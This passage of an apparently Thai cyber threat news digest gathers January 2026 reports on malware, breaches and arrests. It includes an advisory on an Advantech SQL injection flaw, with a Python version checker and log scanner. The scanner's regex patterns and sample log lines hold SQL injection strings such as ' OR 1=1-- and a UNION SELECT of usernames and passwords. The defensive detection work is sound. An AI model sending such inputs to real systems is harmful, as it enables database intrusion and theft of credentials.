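      Two details matter in practice: the base directory must itself be canonicalised before the comparison, or a symlinked base (e.g. /tmp on macOS) produces false rejections; and the check has to run at the moment of the file operation, since a symlink created between the check and the write reopens the hole.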

      Malware

      • RMM Tools (Syncro, SuperOps, NinjaOne, Etc.) Being Distributed Disguised As Video Files
        "AhnLab SEcurity intelligence Center (ASEC) recently discovered cases of attacks using RMM tools such as Syncro, SuperOps, NinjaOne, and ScreenConnect. Threat actors distributed a PDF file that prompted users to download and run the RMM tool from a disguised distribution page such as Google Drive. The certificate used to sign the malware shows that the threat actor has been performing similar attacks since at least October 2025."
        https://asec.ahnlab.com/en/91995/
      • The Unfriending Truth: How To Spot a Facebook Phishing Scam Before It's Too Late
        "As one of the world's largest social media platforms, with over 3 billion active users, Facebook is a frequent target for phishing scams. Hackers aim to hijack user accounts to exploit people in their network. The goal is to steal the victim's credentials so the attackers can take over the account, spread scams, steal personal data, or commit identity fraud. In the second half of 2025, Trellix observed a surge in Facebook phishing scams employing a variety of tactics and techniques, most notably the "Browser in the Browser" (BitB) technique. This advanced method tricks users by simulating a legitimate third-party login pop-up window (like a Facebook authentication screen) within the browser tab, effectively masking a credential-harvesting page."
        https://www.trellix.com/en-au/blogs/research/the-unfriending-truth-how-to-spot-a-facebook-phishing-scam/
        https://www.bleepingcomputer.com/news/security/facebook-login-thieves-now-using-browser-in-browser-trick/
      • 'Bad Actor' Hijacks Apex Legends Characters In Live Matches
        "Apex Legends players over the weekend experienced disruptions during live matches as threat actors hijacked their characters, disconnected them, and changed their nicknames. Respawn, the publisher of the still popular battle royale-hero shooter, issued a public statement about the security incident, assuring players that it hadn't been caused by an exploit or malware infection. The title continues to have a large user base, with an estimated half a million daily concurrent players across all platforms as of mid-2025."
        https://www.bleepingcomputer.com/news/security/bad-actor-hijacks-apex-legends-characters-in-live-matches/
      • Hidden Telegram Proxy Links Can Reveal Your IP Address In One Click
        "A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers due to how proxy links are handled. Telegram tells BleepingComputer it will now add warnings to proxy links after researchers demonstrated that specially crafted links could be used to reveal a Telegram user's real IP address without any further confirmation."
        https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/
      • n8mare On Auth Street: Supply Chain Attack Targets n8n Ecosystem
        "Attackers infiltrated n8n's community node ecosystem this week with a malicious npm package that masqueraded as a Google Ads integration. The package, n8n-nodes-hfgjf-irtuinvcm-lasdqewriit, tricked developers into entering OAuth credentials through what appeared to be a legitimate credential form, then silently exfiltrated them during workflow execution to an attacker-controlled server. This novel supply chain attack—targeting users beyond n8n's recently disclosed remote code execution (RCE) flaws—demonstrates how threat actors are exploiting trust in community-maintained integrations."
        https://www.endorlabs.com/learn/n8mare-on-auth-street-supply-chain-attack-targets-n8n-ecosystem
        https://thehackernews.com/2026/01/n8n-supply-chain-attack-abuses.html
      • Scaling The Fraud Economy: Pig Butchering As a Service
        "The scam industry has undergone massive transformations over the last decade. The cliché image of the once-iconic Nigerian prince duping Westerners from a local cybercafé is now passé. Western Africa is still a hotbed for digital fraud operations, but it has been superseded in both scale and efficiency by hundreds of industrial-scale scam centres now scattered throughout Southeast Asia. Over the past decade major Chinese-speaking criminal groups have managed to infiltrate a growing number of countries in Southeast Asia, securing vast amounts of land to build cities and special economic zones dedicated to crime operations."
        https://www.infoblox.com/blog/threat-intelligence/scaling-the-fraud-economy-pig-butchering-as-a-service/
        https://thehackernews.com/2026/01/researchers-uncover-service-providers.html
      • Analyzing a Multi-Stage AsyncRAT Campaign Via Managed Detection And Response
        "AsyncRAT has emerged as a notable Remote Access Trojan (RAT) used by threat actors for its robust capabilities and ease of deployment. It gained favor for its extensive feature set, which includes keylogging, screen capturing, and remote command execution capabilities. Its modular architecture, typically implemented in Python, provides flexibility and ease of customization, making it a preferred tool of choice for cybercriminals. During our investigation of AsyncRAT infections, we observed Python scripts playing a central role in the infection chain, automating various stages of the attack."
        https://www.trendmicro.com/en_us/research/26/a/analyzing-a-a-multi-stage-asyncrat-campaign-via-mdr.html
      • Malicious Crystal PDF Converter Detected On SLTT Networks
        "In late October 2025, the Center for Internet Security® (CIS®) Cyber Threat Intelligence (CTI) team observed an increase in CIS Managed Detection and Response™ (CIS MDR™) alerts associated with a malicious fake PDF converter called Crystal PDF on U.S. State, Local, Tribal, and Territorial (SLTT) government entity endpoints. The CIS CTI team’s analysis confirmed that Crystal PDF is a managed .NET (F#) staged loader, but the second-stage payload was unavailable for analysis."
        https://www.cisecurity.org/insights/blog/malicious-crystal-pdf-converter-detected-on-sltt-networks
      • THE KNOWNSEC LEAK: Yet Another Leak Of China’s Contractor-Driven Cyber-Espionage Ecosystem
        "In November of 2025, an allegedly massive leak of data from Chinese company “KnownSec” was posted to a github account. The initial leak was covered by Wired Magazine, and a few other outlets. The leak has since been pulled off of Github and downloaded by very few, and of those few who gained access, only one uploaded 65 documents as a primer to the leak elsewhere for others to see. DTI was able to get the 65 document images and this report is derived from this slice of a much larger leak that is out there but not available."
        https://dti.domaintools.com/the-knownsec-leak-yet-another-leak-of-chinas-contractor-driven-cyber-espionage-ecosystem/

      Breaches/Hacks/Leaks

      • University Of Hawaii Cancer Center Hit By Ransomware Attack
        "University of Hawaii says a ransomware gang breached its Cancer Center in August 2025, stealing data of study participants, including documents from the 1990s containing Social Security numbers. Founded in 1907, the University of Hawaii (UH) System now includes 3 universities and 7 community colleges, as well as 10 campuses and training and research centers across the Hawaiian Islands. Its Cancer Center is located in the Kakaʻako district of Honolulu and has over 300 faculty and staff, as well as an additional 200 affiliate members."
        https://www.bleepingcomputer.com/news/security/university-of-hawaii-cancer-center-hit-by-ransomware-attack/
        https://www.securityweek.com/hackers-accessed-university-of-hawaii-cancer-center-patient-data-they-werent-immediately-notified/
      • Target's Dev Server Offline After Hackers Claim To Steal Source Code
        "Hackers are claiming to be selling internal source code belonging to Target Corporation, after publishing what appears to be a sample of stolen code repositories on a public software development platform. Last week, an unknown threat actor created multiple repositories on Gitea that appeared to contain portions of Target's internal code and developer documentation. The repositories were presented as a preview of a much larger dataset allegedly being offered for sale to buyers on an underground forum or private channel."
        https://www.bleepingcomputer.com/news/security/targets-dev-server-offline-after-hackers-claim-to-steal-source-code/
      • Spanish Energy Giant Endesa Discloses Data Breach Affecting Customers
        "Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the company's systems and accessed contract-related information, which includes personal details. Endesa is the largest electric utility company in Spain, now owned by Enel Group, that distributes gas and electricity to more than 10 million customers in Spain and Portugal. In total, the company says it has about 22 million clients."
        https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/
      • Everest Ransomware Claims Breach At Nissan, Says 900GB Of Data Stolen
        "The notorious Everest ransomware group claims to have breached Nissan Motor Corporation (Nissan Motor Co., Ltd.), the Japanese multinational automobile manufacturer. The group published its claims on its dark web leak site on January 10, 2026, sharing six screenshots allegedly taken from the stolen data. They also revealed a directory structure showing ZIP archives, text files, Excel sheets, and CSV documents."
        https://hackread.com/everest-ransomware-nissan-data-breach/
      • Armenia Probes Alleged Sale Of 8 Million Government Records On Hacker Forum
        "Hackers are offering for sale what they claim is a large trove of Armenian government-related data, prompting officials in Yerevan to open an investigation into a potential breach. The alleged seller, using the alias dk0m, said it gained access to a government notification system used to distribute official communications, including legal and administrative notices."
        https://therecord.media/armenia-probes-alleged-sale-government-records

      General News

      • What Security Teams Can Learn From Torrent Metadata
        "Security teams often spend time sorting through logs and alerts that point to activity happening outside corporate networks. Torrent traffic shows up in investigations tied to policy violations, insider risk, and criminal activity. A new research paper looks at that same torrent activity through an open source intelligence lens and asks how much signal security teams can extract from data that is already public."
        https://www.helpnetsecurity.com/2026/01/12/torrent-metadata-osint-research/
      • Downtime Pushes Resilience Planning Into Security Operations
        "CISOs describe a shift in how they define success. New research from Absolute Security shows broad agreement that resilience outweighs security goals centered on prevention alone. Security leaders increasingly define their role around keeping the business operating through disruption. CISOs see themselves as responsible for recovery when incidents interrupt operations. Business continuity, endpoint restoration, and coordination with IT teams fall within their scope. Formal resilience strategies have become common, indicating that this shift is built into planning instead of treated as an add-on."
        https://www.helpnetsecurity.com/2026/01/12/absolute-ciso-resilience-planning/
      • Statistics Report On Malware Targeting Windows Web Servers In Q4 2025
        "AhnLab SEcurity intelligence Center (ASEC) is using the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting poorly managed Windows web servers. This post will cover the damage status of Windows web servers that have become attack targets and the statistics of attacks that occurred against these servers in the fourth quarter of 2025. Additionally, it will categorize the malware strains used in each attack and provide detailed statistics."
        https://asec.ahnlab.com/en/92002/
      • Statistics Report On Malware Targeting Windows Database Servers In Q4 2025
        "AhnLab SEcurity intelligence Center (ASEC) utilizes the AhnLab Smart Defense (ASD) infrastructure to respond to and categorize attacks targeting MS-SQL and MySQL servers installed on Windows operating systems. This post covers the damage status of MS-SQL and MySQL servers that have become attack targets and statistics on attacks against these servers, based on the logs identified in the fourth quarter of 2025. It also categorizes the malware strains used in each attack and provides detailed statistics."
        https://asec.ahnlab.com/en/92003/
      • Statistics Report On Malware Targeting Linux SSH Servers In Q4 2025
        "AhnLab SEcurity intelligence Center (ASEC) utilizes a honeypot to respond to and classify brute-force and dictionary attacks targeting poorly managed Linux SSH servers. This post covers the status of the attack sources identified in the logs from the fourth quarter of 2025 and the statistics of attacks launched by these sources. It also classifies the malware strains used in each attack and provides detailed statistics."
        https://asec.ahnlab.com/en/92004/
      • Hacker Gets Seven Years For Breaching Rotterdam And Antwerp Ports
        "The Amsterdam Court of Appeal sentenced a 44-year-old Dutch national to seven years in prison for multiple crimes, including computer hacking and attempted extortion. The man was arrested in 2021 and convicted in 2022 by the Amsterdam District Court, but he appealed the sentence because authorities had unlawfully intercepted his communications, deriving incriminating evidence. These communications occurred on the end-to-end encrypted chat service Sky ECC. Europol 'cracked' the service in 2021, which led to the arrest of the CEO and multiple users. The actions deriving from the operation extended into last year."
        https://www.bleepingcomputer.com/news/security/hacker-gets-seven-years-for-breaching-rotterdam-and-antwerp-ports/
        https://therecord.media/dutch-court-sentences-hacker-who-smuggled-cocaine-ports
      • Cybersecurity In The Public Sector: Challenges, Strategies And Best Practices
        "Once upon a time, computer crimes were associated with the image of a hacker in a black hoodie working in a dark room by the glow of a monitor. But times have changed, and so have the threats. From simple penetration attempts, cyber attacks have evolved into complex, coordinated operations specifically targeting state systems, rather than pursued merely for entertainment or recognition."
        https://hackread.com/cybersecurity-public-sector-challenges-strategies-practices/
      • Rethinking OT Security For Project Heavy Shipyards
        "In this Help Net Security interview, Hans Quivooij, CISO at Damen Shipyards Group, discusses securing OT and ICS in the shipyard. He outlines how project-based operations, rotating contractors, and temporary systems expand the threat surface and complicate access control. Quivooij also covers visibility in legacy environments and the risks introduced by IT and OT integration."
        https://www.helpnetsecurity.com/2026/01/12/hans-quivooij-damen-shipyards-group-securing-shipyard-ot-ics/
      • Global Cybersecurity Outlook 2026
        "The World Economic Forum's Global Cybersecurity Outlook 2026, written in collaboration with Accenture, examines the cybersecurity trends that will affect economies and societies in the year to come. The report explores how accelerating AI adoption, geopolitical fragmentation and widening cyber inequity are reshaping the global risk landscape. As attacks grow faster, more complex and more unevenly distributed, organizations and governments face rising pressure to adapt amid persistent sovereignty challenges and widening capability gaps. Drawing on leaders’ perspectives, the report provides actionable insights to inform strategy, investment and policy."
        https://www.weforum.org/publications/global-cybersecurity-outlook-2026/
        https://reports.weforum.org/docs/WEF_Global_Cybersecurity_Outlook_2026.pdf
        https://www.infosecurity-magazine.com/news/fraud-overtakes-ransomware-as-top/
      • Cyber Insights 2026: What CISOs Can Expect In 2026 And Beyond
        "The responsibility of the CISO is ever increasing, and this won’t slow down in the coming years. Paul Kivikink, VP of product management and technology partnerships, at DataBee, explains the starting point: “Traditionally, CISOs came up through the technical ranks, deeply rooted in cybersecurity operations. But as cyber risk has become a board-level concern, the CISO is now expected to speak the language of business, connecting security investments to revenue protection, regulatory compliance, and enterprise resilience.”"
        https://www.securityweek.com/cyber-insights-2026-what-cisos-can-expect-in-2026-and-beyond/
      • Block CISO: We Red-Teamed Our Own AI Agent To Run An Infostealer On An Employee Laptop
        "When it comes to security, AI agents are like self-driving cars, according to Block Chief Information Security Officer James Nettesheim. "It's not enough for self-driving cars to be just as good as humans," Nettesheim said in an exclusive interview with The Register. "They have to be safer and better than humans - and provably so. We need that with our agentic use, too." The parent company of Square, Cash App, and Afterpay is pushing hard to position itself as an AI leader, co-designing the Model Context Protocol (MCP) with Anthropic and using MCP to build Goose, its open source AI agent that's used by almost all Block's 12,000 employees and connects to all of the company's systems including Google accounts and Square payments."
        https://www.theregister.com/2026/01/12/block_ai_agent_goose/
      • 2026 Crypto Crime Report Key Insights: TRM Identifies Record USD 158 Billion In Illicit Crypto Flows In 2025, Reversing a Multi-Year Decline
        "This blog features key highlights from TRM’s upcoming 2026 Crypto Crime Report. Be sure to check back in the coming weeks to get your complete copy. Illicit crypto volume reached an all-time high of USD 158 billion in 2025, up nearly 145% from 2024. Despite the increase in absolute illicit volume, illicit volume as a proportion of overall crypto volume fell in 2025, from 1.3% in 2024 to 1.2% in 2025. While illicit activity represented a small share of overall on-chain volume, illicit entities captured 2.7% of available crypto liquidity in 2025, using a new metric that frames risk relative to deployable capital rather than raw transaction volume."
        https://www.trmlabs.com/resources/blog/2026-crypto-crime-report-key-insights-trm-identifies-record-usd-158-billion-in-illicit-crypto-flows-in-2025-reversing-a-multi-year-decline
        https://www.infosecurity-magazine.com/news/illicit-crypto-activity-record/

      References
      Electronic Transactions Development Agency (ETDA)
    • Spain dismantles a cybercrime network, arresting 34 suspects linked to Black Axe who used money-mule accounts to receive transfers
    • Crypto-related cybercrime hit a record high in 2025
    • FBI warns that the Kimsuky hacker group uses QR codes to break into systems and bypass organisations' MFA protections
    • 🚨 Check and remediate urgently!! A critical vulnerability in Advantech products puts systems reachable from external networks at risk of takeover and theft of sensitive data

      🔴 Vulnerability details
      • CVE-2025-52694 is a critical-severity vulnerability (CVSS score 10.0) of the SQL injection class, caused by improper validation and sanitisation of input in Advantech IoTSuite / IoT Edge products.
      • Advantech IoTSuite / IoT Edge systems reachable from external networks are at risk of remote attack without authentication: an attacker sends specially crafted SQL statements to the backend database, which may lead to access to sensitive data, modification or destruction of data, or the system being unable to provide normal service.

      🎯 Affected products
      • Advantech IoTSuite SaaSComposer before version 3.4.15
      • Advantech IoTSuite Growth Linux docker before version V2.0.2
      • Advantech IoTSuite Starter Linux docker before version V2.0.2
      • Advantech IoT Edge Linux docker before version V2.0.2
      • Advantech IoT Edge Windows before version V2.0.2

      1. Detection guidance
        • Check whether your organisation runs Advantech IoTSuite or IoT Edge in one of the affected versions.
        • Check whether the system is exposed to external networks or the public internet.
        • Review system and database logs for abnormal behaviour or attempts to submit unusual SQL statements.
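      The first and third detection steps above (version inventory against the affected-version list, and a first pass over web access logs for SQL-injection attempts), as an added example that is not part of the advisory and not Advantech's software. Assumptions: product names and installed versions are supplied from your own inventory in the form the advisory uses; the combined-format log lines are constructed samples, not real traffic; and the SQL-injection patterns are generic indicators for the vulnerability class, not a signature for CVE-2025-52694, whose vulnerable parameter the advisory does not describe.

```python
"""Added example: version inventory check and access-log triage for the advisory above.
Not Advantech code. Log lines below are constructed; SQLi patterns are generic."""
import re
from urllib.parse import unquote_plus

# First fixed version per product, as listed in the advisory; anything older is affected.
FIXED_VERSIONS = {
    "IoTSuite SaaSComposer": "3.4.15",
    "IoTSuite Growth Linux docker": "V2.0.2",
    "IoTSuite Starter Linux docker": "V2.0.2",
    "IoT Edge Linux docker": "V2.0.2",
    "IoT Edge Windows": "V2.0.2",
}


def parse_version(v: str) -> tuple:
    """'V2.0.1' -> (2, 0, 1). Integer tuples compare correctly (2.0.10 > 2.0.2)."""
    return tuple(int(part) for part in v.strip().lstrip("Vv").split("."))


def is_affected(product: str, installed: str) -> bool:
    """True when the installed version is older than the first fixed version."""
    fixed = FIXED_VERSIONS.get(product)
    if fixed is None:
        raise KeyError(f"product not in advisory list: {product}")
    return parse_version(installed) < parse_version(fixed)


# Coarse SQL-injection indicators, applied to the URL-decoded request path.
# These are class-level heuristics (assumption), not a CVE-specific signature.
SQLI_PATTERNS = [
    re.compile(r"(?i)'\s*(or|and)\s+[\w']+\s*=\s*[\w']+"),            # ' OR 1=1
    re.compile(r"(?i)\bunion\b.+\bselect\b"),                          # UNION SELECT
    re.compile(r"(?i)\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b"),  # time-based
    re.compile(r"(?i);\s*(drop|delete|update|insert)\b"),              # stacked queries
    re.compile(r"--\s*$|/\*.*\*/|#$"),                                 # comment truncation
]

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return (ip, timestamp, decoded path, matched pattern) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        decoded = unquote_plus(m["path"])  # attackers URL-encode payloads; match on decoded text
        for pattern in SQLI_PATTERNS:
            if pattern.search(decoded):
                hits.append((m["ip"], m["ts"], decoded, pattern.pattern))
                break
    return hits


# Constructed sample lines (documentation IP ranges, fictional paths) for offline use.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jan/2026:08:01:12 +0700] "GET /api/devices?id=42 HTTP/1.1" 200 512',
    '203.0.113.7 - - [13/Jan/2026:08:01:15 +0700] "GET /api/devices?id=42%27%20OR%201%3D1-- HTTP/1.1" 200 98231',
    '198.51.100.9 - - [13/Jan/2026:08:02:40 +0700] "GET /api/devices?id=1%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 500 120',
    '198.51.100.9 - - [13/Jan/2026:08:02:41 +0700] "POST /api/login HTTP/1.1" 302 0',
    '192.0.2.55 - - [13/Jan/2026:08:03:03 +0700] "GET /api/devices?id=7%3B%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for product, version in [("IoT Edge Windows", "V2.0.1"), ("IoTSuite SaaSComposer", "3.4.15")]:
        print(f"{product} {version}: {'AFFECTED' if is_affected(product, version) else 'ok'}")
    for ip, ts, path, _ in scan_access_log(SAMPLE_LOG):
        print(f"[{ts}] {ip} suspicious request: {path}")
```

      Versions are compared as integer tuples so that 2.0.10 is treated as newer than 2.0.2, which a plain string comparison would get wrong. The log heuristics are deliberately coarse and will flag legitimate requests that happen to contain words such as UNION, so treat hits as leads for the log review the advisory asks for, not as verdicts; a large response size on a flagged request (as in the second sample line) is the kind of corroborating signal worth checking next.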

      2. Mitigation guidance
        • Update the software to the latest version in which the vendor has fixed the vulnerability.
        • For IoTSuite SaaSComposer, IoTSuite Growth (Linux Docker) and IoT Edge (Windows), contact Advantech for information and the officially fixed version, as described at:
          https://dg.th/v6ju5r8wxz
        • For IoTSuite Starter (Linux Docker), download and install the patch from Advantech, as described at:
          https://dg.th/cyof2tbkl3
        • For IoT Edge (Linux Docker), download and install the patch from Advantech, as described at:
          https://dg.th/wqx1o0y6r9

      3. Interim measures (if you cannot update immediately)
        • Disable, or restrict, access to the affected service from public networks.
        • Use a firewall or Web Application Firewall (WAF) to filter requests with abnormal characteristics.
        • Monitor cyber security events closely.

      🔗 References
      https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/
      https://nvd.nist.gov/vuln/detail/CVE-2025-52694

      ThaiCERT recommends that users and administrators of these products check and update to the latest version immediately, to reduce the risk of attack and prevent possible damage.
    • MuddyWater uses the RustyWater RAT, delivered by spear-phishing emails that lure targets into opening Word files, to attack organisations in the Middle East
    • BreachForums database leaked, exposing more than 324,000 user accounts
    • Russian hacker group APT28 targets energy-sector organisations and international policy bodies
    • Cyber Threat Intelligence 12 January 2026

      Healthcare Sector

      • Healthcare Chatbots Provoke Unease In AI Governance Analysts
        "When an AI chatbot tells people to add glue to pizza, the error is obvious. When it recommends eating more bananas - sound nutritional advice that could be dangerous for someone with kidney failure - the mistake hides in plain sight. That's a risk now poised to reach hundreds of millions of users with little or no regulatory oversight. OpenAI days ago launched ChatGPT Health, allowing users to connect medical records and wellness apps for personalized health guidance."
        https://www.bankinfosecurity.com/healthcare-chatbots-provoke-unease-in-ai-governance-analysts-a-30483

      Vulnerabilities

      • CISA Retires Ten Emergency Directives, Marking An Era In Federal Cybersecurity
        "Today, the Cybersecurity and Infrastructure Security Agency (CISA) announced the successful retirement of ten Emergency Directives issued between 2019-2024. Marking a significant milestone in federal cybersecurity, this is the highest number of Emergency Directives retired by the agency at one time. These directives achieved their mission to mitigate urgent and imminent risks to Federal Civilian Executive Branch (FCEB) agencies. Since their issuance, CISA has partnered closely with federal agencies to drive remediation, embed best practices and overcome systemic challenges - establishing a stronger, more resilient digital infrastructure for a more secure America."
        https://www.cisa.gov/news-events/news/cisa-retires-ten-emergency-directives-marking-era-federal-cybersecurity
        https://thehackernews.com/2026/01/cisa-retires-10-emergency-cybersecurity.html
        https://www.bleepingcomputer.com/news/security/cisa-retires-10-emergency-cyber-orders-in-rare-bulk-closure/
        https://www.securityweek.com/cisa-closes-10-emergency-directives-as-vulnerability-catalog-takes-over/

      Malware

      • Threat Actors Actively Targeting LLMs
        "Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments. GreyNoise customers have received an Executive Situation Report (SITREP) including IOCs and other valuable intelligence from this investigation. Customers, please check your inbox."
        https://www.greynoise.io/blog/threat-actors-actively-targeting-llms
        https://www.bleepingcomputer.com/news/security/hackers-target-misconfigured-proxies-to-access-paid-llm-services/
      • GRU-Linked BlueDelta Evolves Credential Harvesting
        "Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report."
        https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting
        https://assets.recordedfuture.com/insikt-report-pdfs/2026/cta-ru-2026-0107.pdf
        https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credentials-global-targets
        https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html
      • Reborn In Rust: Muddy Water Evolves Tooling With RustyWater Implant
        "CloudSEK’s TRIAD recently identified a spearphishing campaign attributed to the Muddy Water APT group targeting multiple sectors across the Middle East, including diplomatic, maritime, financial, and telecom entities. The campaign uses icon spoofing and malicious Word documents to deliver Rust based implants capable of asynchronous C2, anti-analysis, registry persistence, and modular post-compromise capability expansion. Historically, Muddy Water has relied on PowerShell and VBS loaders for initial access and post-compromise operations. The introduction of Rust-based implants represents a notable tooling evolution toward more structured, modular, and low noise RAT capabilities."
        https://www.cloudsek.com/blog/reborn-in-rust-muddywater-evolves-tooling-with-rustywater-implant
        https://thehackernews.com/2026/01/muddywater-launches-rustywater-rat-via.html

      Breaches/Hacks/Leaks

      • BreachForums Hacking Forum Database Leaked, Exposing 324,000 Accounts
        "The latest incarnation of the notorious BreachForums hacking forum has suffered a data breach, with its user database table leaked online. BreachForums is the name of a series of hacking forums used to trade, sell, and leak stolen data, as well as sell access to corporate networks and other illegal cybercrime services. The site was launched after the first of these forums, RaidForums, was seized by law enforcement, with the owner, "Omnipotent", arrested."
        https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/
        https://hackread.com/breachforums-database-users-leak-admin-disputes/
      • Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records
        "A hacker using the alias “Lovely” is selling nearly 40 million (39,970,158) Condé Nast user records that allegedly belong to the company’s subsidiary websites, many of which rank among the most popular sites worldwide. On December 27, 2025, Hackread.com reported that a hacker using the alias “Lovely” leaked a database containing the personal details of 2.3 million Wired.com users. Wired.com is a major American magazine and website owned by Condé Nast. Alongside the download link, the hacker accused Condé Nast of ignoring repeated security warnings. Three days after the Wired.com leak, the hacker announced that the entire Condé Nast dataset was being put up for sale."
        https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/
      • Instagram Denies Breach Amid Claims Of 17 Million Account Data Leak
        "Instagram says it fixed a bug that allowed threat actors to mass-request password reset emails, amid claims that data from more than 17 million Instagram accounts was scraped and leaked online. "We fixed an issue that allowed an external party to request password reset emails for some Instagram users," a Meta spokesperson told BleepingComputer. "We want to reassure everyone there was no breach of our systems and people's Instagram accounts remain secure. People can disregard these emails and we apologize for any confusion this may have caused.""
        https://www.bleepingcomputer.com/news/security/instagram-denies-breach-amid-claims-of-17-million-account-data-leak/
        https://thecybersecguru.com/news/instagram-data-breach-17-million/
        https://securityaffairs.com/186765/data-breach/a-massive-breach-exposed-data-of-17-5m-instagram-users.html
        https://hackread.com/instagram-user-data-leak-scraped-records-2022/
        https://www.theregister.com/2026/01/11/infosec_news_in_brief/
      • At Least $26 Million In Crypto Stolen From Truebit Platform As Crypto Crime Landscape Evolves
        "Hackers stole more than $26 million worth of cryptocurrency from the Truebit platform on Thursday, marking the first major crypto hack of 2026. The company said in a statement that it became aware of a security incident “involving one or more malicious actors.” “We are in contact with law enforcement and taking all available measures to address the situation,” Truebit said, urging people not to interact with the smart contract that had been affected by the attack."
        https://therecord.media/26-million-in-crypto-stolen-truebit
      • Salt Typhoon Hackers Hit Congressional Emails In New Breach
        "U.S. officials are investigating a suspected Chinese cyber espionage operation compromising email systems used by congressional staff working on House national security committees. The activity, detected in December, appears to have originated from the threat actor commonly tracked as Salt Typhoon, according to researchers tracking the operation. It appears to have affected staff supporting committees with oversight of China policy, foreign affairs, intelligence and the military (see: Chinese Data Leak Reveals Salt Typhoon Contractors)."
        https://www.bankinfosecurity.com/salt-typhoon-hackers-hit-congressional-emails-in-new-breach-a-30484

      General News

      • 34 Arrests In Spain During Action Against The ‘Black Axe’ Criminal Organisation
        "The Spanish National Police (Policía Nacional), in close cooperation with the Bavarian State Criminal Police Office (Bayerisches Landeskriminalamt) and with the support of Europol, has conducted an operation against the international criminal organisation ‘Black Axe’. The action resulted in 34 arrests and significant disruptions to the group's activities. Black Axe is a highly structured, hierarchical group with its origins in Nigeria and a global presence in dozens of countries. The core group of arrested suspects consists of 10 individuals of Nigerian nationality."
        https://www.europol.europa.eu/media-press/newsroom/news/34-arrests-in-spain-during-action-against-black-axe-criminal-organisation
        https://www.bleepingcomputer.com/news/security/spain-arrests-34-suspects-linked-to-black-axe-cyber-crime/
        https://thehackernews.com/2026/01/europol-arrests-34-black-axe-members-in.html
        https://www.infosecurity-magazine.com/news/europol-crackdown-on-black-axe/
        https://hackread.com/europol-black-axe-cybercrime-ring-spain/
      • Identity & Beyond: 2026 Incident Response Predictions
        "In 2026, incident response (IR) will continue its shift away from traditional malware-centric investigations toward identity-driven intrusions, abuse of trusted cloud services, and low-signal, high-impact activity that blends seamlessly into normal business operations. Rather than relying on technical exploits, threat actors are prioritizing legitimate access, persistence, and operational efficiency, enabling them to evade users, security controls, and automated detection."
        https://www.cybereason.com/blog/identity-beyond-2026-incident-response-predictions
      • Crypto Crime Reaches Record High In 2025 As Nation‑State Sanctions Evasion Moves On‑Chain At Scale
        "In 2025, we tracked a notable rise in nation-state activity in crypto, marking the latest phase in the maturation of the illicit on-chain ecosystem. Over the past few years, the crypto crime landscape has become increasingly professionalized; illicit organizations now operate large-scale on-chain infrastructure to help transnational criminal networks procure goods and services and launder their ill-gotten crypto. Against that backdrop, we have seen nation-states moving into this space, both by tapping into these same professionalized service providers and by standing up their own bespoke infrastructure to evade sanctions at scale."
        https://www.chainalysis.com/blog/2026-crypto-crime-report-introduction/
        https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation-states
      • How AI Agents Are Turning Security Inside-Out
        "AppSec teams have spent the last decade hardening externally facing applications, API security, software supply chain risk, CI/CD controls, and cloud-native attack paths. But a growing class of security threats is emerging from a largely underestimated and undefended source: internally built no-code assets."
        https://www.helpnetsecurity.com/2026/01/09/ai-agents-appsec-risk/
      • Security Teams Are Paying More Attention To The Energy Cost Of Detection
        "Security teams spend a lot of time explaining why detection systems need more compute. Cloud bills rise, models retrain more often, and new analytics pipelines get added to existing stacks. Those conversations usually stay focused on coverage and accuracy. A recent study takes a different approach by measuring anomaly detection models alongside their energy use and associated carbon output, treating compute consumption as part of security operations."
        https://www.helpnetsecurity.com/2026/01/09/energy-aware-cybersecurity-ai-research/
      • Wi-Fi Evolution Tightens Focus On Access Control
        "Wi-Fi networks are taking on heavier workloads, more devices, and higher expectations from users who assume constant access everywhere. A new Wireless Broadband Alliance industry study shows that this expansion is reshaping priorities around security, identity, and trust, alongside adoption of new Wi-Fi standards."
        https://www.helpnetsecurity.com/2026/01/09/wba-wi-fi-access-control/

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • Urgent! Alert: DarkSpectre malware campaign hiding in browser extensions, with risk of attack and device takeover

      The National Computer System Security Coordination Center (ThaiCERT) has been monitoring the cyber threat situation and has found information on the DarkSpectre malware campaign, which hides in browser extensions that appear to be legitimate.

      If a user installs or enables an affected extension, an attacker may be able to inject malicious code, download additional payloads from a command-and-control (C2) server, and take control of the device remotely, affecting the security of the information systems of agencies and organisations.

      1. Threat details

      1.1 Cyber security researchers at Koi detected and disclosed the DarkSpectre malware campaign, a large-scale attack operation.
